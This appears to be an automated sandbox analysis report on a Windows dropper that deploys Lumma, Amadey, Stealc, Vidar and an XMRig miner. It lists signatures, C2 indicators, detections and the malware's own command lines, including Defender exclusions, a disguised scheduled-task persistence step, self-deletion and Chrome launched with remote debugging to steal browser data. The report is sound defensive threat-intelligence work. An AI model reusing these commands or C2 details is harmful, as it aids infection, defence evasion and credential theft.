Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1579188
MD5: 3799f4f2cfc27184ce70913f4ec3a8be
SHA1: 4424871cdfd4f9b4fb1039049a75844401a7c358
SHA256: f95df3026cf4edcc3d334bfc20d188de06ea4e4497e94c63504b2b783dc3e55e
Tags: exe user-Bitsight

Detection

LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Attempt to bypass Chrome Application-Bound Encryption
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Amadey's stealer DLL
Yara detected Credential Flusher
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Creates HTML files with .exe extension (expired dropper behavior)
Creates multiple autostart registry keys
Drops PE files to the document folder of the user
Drops password protected ZIP file
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found strings related to Crypto-Mining
Hides threads from debuggers
Injects code into the Windows Explorer (explorer.exe)
Loading BitLocker PowerShell Module
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the context of a thread in another process (thread injection)
PE file contains section with special chars
PE file has a writeable .text section
Query firmware table information (likely to detect VMs)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Suspicious powershell command line found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Uses cmd line tools excessively to alter registry or file data
Uses ping.exe to check the status of other devices and networks
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Connects to several IPs in different countries
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Sigma detected: Browser Started with Remote Debugging
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 7292 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 3799F4F2CFC27184CE70913F4EC3A8BE)
    • skotes.exe (PID: 7488 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 3799F4F2CFC27184CE70913F4EC3A8BE)
  • skotes.exe (PID: 8008 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 3799F4F2CFC27184CE70913F4EC3A8BE)
    • 9bc5ebea0e.exe (PID: 3060 cmdline: "C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exe" MD5: 3A425626CBD40345F5B8DDDD6B2B9EFA)
      • cmd.exe (PID: 6656 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • mode.com (PID: 2032 cmdline: mode 65,10 MD5: BEA7464830980BF7C0490307DB4FC875)
        • 7z.exe (PID: 6588 cmdline: 7z.exe e file.zip -p24291711423417250691697322505 -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • 7z.exe (PID: 6544 cmdline: 7z.exe e extracted/file_7.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • 7z.exe (PID: 7460 cmdline: 7z.exe e extracted/file_6.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • 7z.exe (PID: 1440 cmdline: 7z.exe e extracted/file_5.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • 7z.exe (PID: 7340 cmdline: 7z.exe e extracted/file_4.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • 7z.exe (PID: 7384 cmdline: 7z.exe e extracted/file_3.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • 7z.exe (PID: 7400 cmdline: 7z.exe e extracted/file_2.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • 7z.exe (PID: 7472 cmdline: 7z.exe e extracted/file_1.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • attrib.exe (PID: 980 cmdline: attrib +H "in.exe" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
        • in.exe (PID: 648 cmdline: "in.exe" MD5: 83D75087C9BF6E4F07C36E550731CCDE)
          • attrib.exe (PID: 744 cmdline: attrib +H +S C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
            • conhost.exe (PID: 7508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • attrib.exe (PID: 7500 cmdline: attrib +H C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
            • conhost.exe (PID: 7520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • schtasks.exe (PID: 7512 cmdline: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • conhost.exe (PID: 7584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7560 cmdline: powershell ping 127.0.0.1; del in.exe MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • PING.EXE (PID: 1608 cmdline: "C:\Windows\system32\PING.EXE" 127.0.0.1 MD5: 2F46799D79D22AC72C241EC0322B011D)
    • 4268204ace.exe (PID: 7312 cmdline: "C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe" MD5: 04F57C6FB2B2CD8DCC4B38E4A93D4366)
      • conhost.exe (PID: 7320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1020 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath "C:\pnpyqs" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 5680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6072 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 3684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • 7d28d37061cb43098969a37cf25a380a.exe (PID: 5916 cmdline: "C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exe" MD5: CC36E2A5A3C64941A79C31CA320E9797)
        • chrome.exe (PID: 7540 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • chrome.exe (PID: 7776 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2332 --field-trial-handle=2276,i,12319100627993208386,7193125325130927108,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • 9c2981f3e5.exe (PID: 7608 cmdline: "C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exe" MD5: 6D3D9DB92D0303C635E5EE37927AF3D0)
    • 0577f55121.exe (PID: 1908 cmdline: "C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe" MD5: 8A1AE39FD06F240834EE7731E4470D2F)
    • 77594b3442.exe (PID: 7456 cmdline: "C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe" MD5: C20D4E11E1046A5665D427BB4F6DE39E)
    • 513dad5c05.exe (PID: 7432 cmdline: "C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe" MD5: 6149ACB6D658FE29407A8AB94D3A0784)
      • chrome.exe (PID: 6200 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • 9d4ddc637a.exe (PID: 5600 cmdline: "C:\Users\user\AppData\Local\Temp\1019033001\9d4ddc637a.exe" MD5: FB1BFBB2B0FA71F93BEFD137BECD031B)
  • Intel_PTT_EK_Recertification.exe (PID: 7772 cmdline: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe MD5: 83D75087C9BF6E4F07C36E550731CCDE)
    • explorer.exe (PID: 2368 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
    • powershell.exe (PID: 7872 cmdline: powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 3796 cmdline: "C:\Windows\system32\PING.EXE" 127.1.10.1 MD5: 2F46799D79D22AC72C241EC0322B011D)
  • svchost.exe (PID: 3156 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • Intel_PTT_EK_Recertification.exe (PID: 7588 cmdline: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe MD5: 83D75087C9BF6E4F07C36E550731CCDE)
    • explorer.exe (PID: 7580 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
    • powershell.exe (PID: 2176 cmdline: powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • 77594b3442.exe (PID: 2264 cmdline: "C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe" MD5: C20D4E11E1046A5665D427BB4F6DE39E)
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name: Amadey
Description: Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings, and its development relied on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name: Vidar
Description: Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Name: xmrig
Description: According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling". In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
{"C2 url": ["sustainskelet.lat", "sweepyribs.lat", "crosshuaht.lat", "rapeflowwj.lat", "necklacebudi.lat", "discokeyus.lat", "energyaffai.lat", "aspecteirs.lat", "grannyejh.lat"], "Build id": "PsFKDg--pablo"}
{"C2 url": "https://steamcommunity.com/profiles/76561199809363512", "Botnet": "m0nk3"}
{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exe; Rule: JoeSecurity_Vidar_1; Description: Yara detected Vidar stealer; Author: Joe Security

Source: 00000024.00000002.2597232510.0000000000E09000.00000004.00000020.00020000.00000000.sdmp; Rule: JoeSecurity_Xmrig; Description: Yara detected Xmrig cryptocurrency miner; Author: Joe Security
Source: 00000033.00000002.2996017964.000000014040B000.00000004.00000001.00020000.00000000.sdmp; Rule: JoeSecurity_Xmrig; Description: Yara detected Xmrig cryptocurrency miner; Author: Joe Security
Source: 0000000F.00000002.2742198429.0000000003B95000.00000004.00000800.00020000.00000000.sdmp; Rule: JoeSecurity_Vidar_1; Description: Yara detected Vidar stealer; Author: Joe Security
Source: 00000024.00000002.2597932225.00000001402DD000.00000002.00000001.00020000.00000000.sdmp; Rule: JoeSecurity_Xmrig; Description: Yara detected Xmrig cryptocurrency miner; Author: Joe Security
Source: 00000038.00000003.2987064495.0000000004B70000.00000004.00001000.00020000.00000000.sdmp; Rule: JoeSecurity_Stealc; Description: Yara detected Stealc; Author: Joe Security

Source: 43.0.7d28d37061cb43098969a37cf25a380a.exe.400000.0.unpack; Rule: JoeSecurity_Vidar_1; Description: Yara detected Vidar stealer; Author: Joe Security
Source: 0.2.file.exe.50000.0.unpack; Rule: JoeSecurity_Amadey_2; Description: Yara detected Amadey's stealer DLL; Author: Joe Security
Source: 1.2.skotes.exe.6f0000.0.unpack; Rule: JoeSecurity_Amadey_2; Description: Yara detected Amadey's stealer DLL; Author: Joe Security
Source: 36.2.explorer.exe.140000000.0.unpack; Rule: JoeSecurity_Xmrig; Description: Yara detected Xmrig cryptocurrency miner; Author: Joe Security
Source: 36.2.explorer.exe.140000000.0.unpack; Rule: MAL_XMR_Miner_May19_1; Description: Detects Monero Crypto Coin Miner; Author: Florian Roth; Strings:
  • 0x325ac8:$x1: donate.ssl.xmrig.com

                      System Summary

Source: Registry Key set; Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing; Data: Details: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 8008, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\77594b3442.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath "C:\pnpyqs", CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath "C:\pnpyqs", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe, ParentProcessId: 7312, ParentProcessName: 4268204ace.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath "C:\pnpyqs", ProcessId: 1020, ProcessName: powershell.exe
Source: Process started; Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems); Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exe" , ParentImage: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exe, ParentProcessId: 5916, ParentProcessName: 7d28d37061cb43098969a37cf25a380a.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 7540, ProcessName: chrome.exe
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 8008, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\77594b3442.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath "C:\pnpyqs", CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath "C:\pnpyqs", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe, ParentProcessId: 7312, ParentProcessName: 4268204ace.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath "C:\pnpyqs", ProcessId: 1020, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE, CommandLine: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE, CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "in.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\main\in.exe, ParentProcessId: 648, ParentProcessName: in.exe, ProcessCommandLine: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE, ProcessId: 7512, ProcessName: schtasks.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE, CommandLine: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE, CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "in.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\main\in.exe, ParentProcessId: 648, ParentProcessName: in.exe, ProcessCommandLine: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE, ProcessId: 7512, ProcessName: schtasks.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: powershell ping 127.0.0.1; del in.exe, CommandLine: powershell ping 127.0.0.1; del in.exe, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "in.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\main\in.exe, ParentProcessId: 648, ParentProcessName: in.exe, ProcessCommandLine: powershell ping 127.0.0.1; del in.exe, ProcessId: 7560, ProcessName: powershell.exe
Source: Process started; Author: vburov; Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 3156, ProcessName: svchost.exe
                      No Suricata rule has matched

                      AV Detection

Source: file.exe; Avira: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[3].exe; Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe; Avira: detection malicious, Label: HEUR/AGEN.1320706
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe; Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[3].exe; Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: 0000000F.00000002.2742198429.0000000003B95000.00000004.00000800.00020000.00000000.sdmp; Malware Configuration Extractor: Vidar {"C2 url": "https://steamcommunity.com/profiles/76561199809363512", "Botnet": "m0nk3"}
Source: 00000000.00000002.1765112724.0000000000051000.00000040.00000001.01000000.00000003.sdmp; Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 77594b3442.exe.7456.49.memstrmin; Malware Configuration Extractor: LummaC {"C2 url": ["sustainskelet.lat", "sweepyribs.lat", "crosshuaht.lat", "rapeflowwj.lat", "necklacebudi.lat", "discokeyus.lat", "energyaffai.lat", "aspecteirs.lat", "grannyejh.lat"], "Build id": "PsFKDg--pablo"}
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe; ReversingLabs: Detection: 37%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[4].exe; ReversingLabs: Detection: 66%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe; ReversingLabs: Detection: 56%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[3].exe; ReversingLabs: Detection: 57%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[5].exe; ReversingLabs: Detection: 27%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe; ReversingLabs: Detection: 86%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[3].exe; ReversingLabs: Detection: 68%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\soft[1]; ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exe; ReversingLabs: Detection: 86%
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe; ReversingLabs: Detection: 56%
Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe; ReversingLabs: Detection: 37%
Source: C:\Users\user\AppData\Local\Temp\1019035001\964c9facda.exe; ReversingLabs: Detection: 57%
Source: C:\Users\user\AppData\Local\Temp\1019036001\164919d456.exe; ReversingLabs: Detection: 68%
Source: C:\Users\user\AppData\Local\Temp\1019038001\fcd2b0e3cd.exe; ReversingLabs: Detection: 66%
Source: C:\Users\user\AppData\Local\Temp\1019040001\73c096c84a.exe; ReversingLabs: Detection: 27%
Source: C:\Users\user\AppData\Local\Temp\1v1w92NeCw3SKGKedet\Y-Cleaner.exe; ReversingLabs: Detection: 75%
Source: file.exe; Virustotal: Detection: 55%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 98.1% probability
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[3].exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[4].exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[3].exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe; Joe Sandbox ML: detected
Source: file.exe; Joe Sandbox ML: detected
Source: 9c2981f3e5.exe, 0000002A.00000003.2686987170.0000000007370000.00000004.00001000.00020000.00000000.sdmp; Binary or memory string: -----BEGIN PUBLIC KEY-----memstr_7e0e6c0c-f

Bitcoin Miner

Source: Yara match | File source: 36.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 51.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 34.3.Intel_PTT_EK_Recertification.exe.237117f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 34.3.Intel_PTT_EK_Recertification.exe.237117f0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000024.00000002.2597232510.0000000000E09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
